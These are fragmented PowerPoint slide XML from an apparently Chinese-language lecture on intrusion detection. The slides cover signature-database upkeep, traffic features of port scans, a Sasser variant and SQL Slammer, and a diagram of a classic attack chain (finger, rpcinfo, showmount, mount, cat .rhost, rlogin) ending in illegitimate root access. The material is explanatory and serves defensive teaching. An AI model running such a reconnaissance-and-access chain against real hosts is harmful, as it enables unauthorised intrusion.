            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C08E8DC-C083-DA71-48E1-ADCB805ED79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8" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D280F5FF-01EB-D098-DBD2-DE53849B8DC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9" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7006A067-0F1D-0C2E-6D33-F47951D18B86}"/>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不足</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4827B280-32A3-D217-04D0-5CF9E1594970}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767504" y="4862519"/>
            <a:ext cx="2443836" cy="34556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需及时更新数据库</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="82" name="组合 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D1EF7D4-487F-2258-0271-7A7ED08487E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167429" y="4644078"/>
            <a:ext cx="873460" cy="909891"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="83" name="图片 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{816E1D9C-F724-CD0A-205F-C5E66028D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4" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C35AB0F-CDB9-AD20-A6D0-D80F6F8A4A0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sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{700ED1A9-19EB-746E-9F37-246B2FDB6AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767503" y="5425637"/>
            <a:ext cx="3476827" cy="21653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建立和维护知识库工作量大</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87" name="组合 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16BD625E-6C15-D260-4E4D-6C5E1D293286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5167428" y="5121472"/>
            <a:ext cx="876935" cy="830580"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="88" name="图片 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0DE6C47-60C4-038C-3F92-C6942C614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9" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815A4F9F-6E44-FCB6-AD0D-D9347483B21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pic>
        <p:nvPicPr>
          <p:cNvPr id="95" name="图片 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0A70E2-D5C5-06CC-CD5F-7D2059120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06" y="3939118"/>
            <a:ext cx="2757857" cy="1840007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09C94A13-2C1E-4CE7-B8A7-3210E068A7AC}"/>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99817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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787515" y="5582285"/>
            <a:ext cx="357632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入侵工具唾手可得</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5660390" y="1950720"/>
            <a:ext cx="5831205" cy="3500120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3264535" y="1362710"/>
            <a:ext cx="1386840" cy="1556385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686175" y="5342890"/>
            <a:ext cx="1375410" cy="972820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1433830" y="1877060"/>
            <a:ext cx="2014855" cy="1532255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4558030" y="1381125"/>
            <a:ext cx="1589405" cy="1519555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4397726-0171-AC0F-AA24-8FC4812E0F99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="882935" y="3175947"/>
            <a:ext cx="1828813" cy="1495436"/>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9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2454275" y="3221355"/>
            <a:ext cx="2724150" cy="1776095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1243965" y="4559300"/>
            <a:ext cx="2020570" cy="1101725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="标题 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87B331D1-CAB1-4365-A8E8-B0AACB749916}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络入侵越来越容易了！</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4205194"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特征分析</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事件序列举例</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AE59B86-180D-321E-C30A-1B6285C3C775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5621985" y="1758749"/>
            <a:ext cx="46939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noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取文件访问权限攻击：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Freeform 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84700DAB-3B38-9238-3AFB-5431F58B789E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2143125" y="3036699"/>
            <a:ext cx="7517130" cy="2620655"/>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ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" algn="l" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="825">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C431323-6F87-1C2F-63DB-71AC5B0F8D7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3856642" y="2879318"/>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a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>finger</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA7E41CF-D51B-9F1F-D680-35CD7690B800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5321300" y="5394390"/>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a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mount</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69EB34BE-B005-F9EB-8CA4-53B975454B95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7727239" y="4895221"/>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a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cat .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>rhost</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AD8C02F-DCCF-CB22-72B0-362A5B853C71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8230447" y="3393814"/>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a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>rlogin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6F56DED-5CED-8F34-72D4-72349EB19D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1947459" y="3728033"/>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err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>rpcinfo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5CA8E66-A1C6-579D-C37D-3F759195E136}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2985328" y="5046893"/>
            <a:ext cx="1309521" cy="49604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100" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>showmount</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEA33849-0B93-024E-51FA-89E67A8FC475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6367923" y="2611226"/>
            <a:ext cx="2114550" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Get illegal root</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACF9EB2E-DF7E-4782-8EF0-E1D34BAB69E6}"/>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180075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0.7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childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2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childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="35" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="36" presetID="23" presetClass="entr" presetSubtype="16"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29" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="31" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="32" grpId="0" bldLvl="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0E54BBD0-9F7A-CBE2-6C55-D23FE6A5C49B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3163139642"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1795145" y="2326005"/>
          <a:ext cx="8864834" cy="3749942"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="88900" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2315491">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6549343">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="548772">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20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攻击类型</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" horzOverflow="overflow"/>
                </a:tc>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20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特征描述</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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面向主机的端口扫描</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流数大、平均包长小、源地址少且目的端口多</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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面向网络的端口扫描</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流数大、平均包长小、目的地址多且目的端口少</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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震荡波变种</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目的地址多且目的端口都是</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445</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>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en-US" altLang="zh-CN"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SQLSlammer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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蠕虫</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目的地址多、协议号为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"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17</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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且目标端口为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"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1434</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
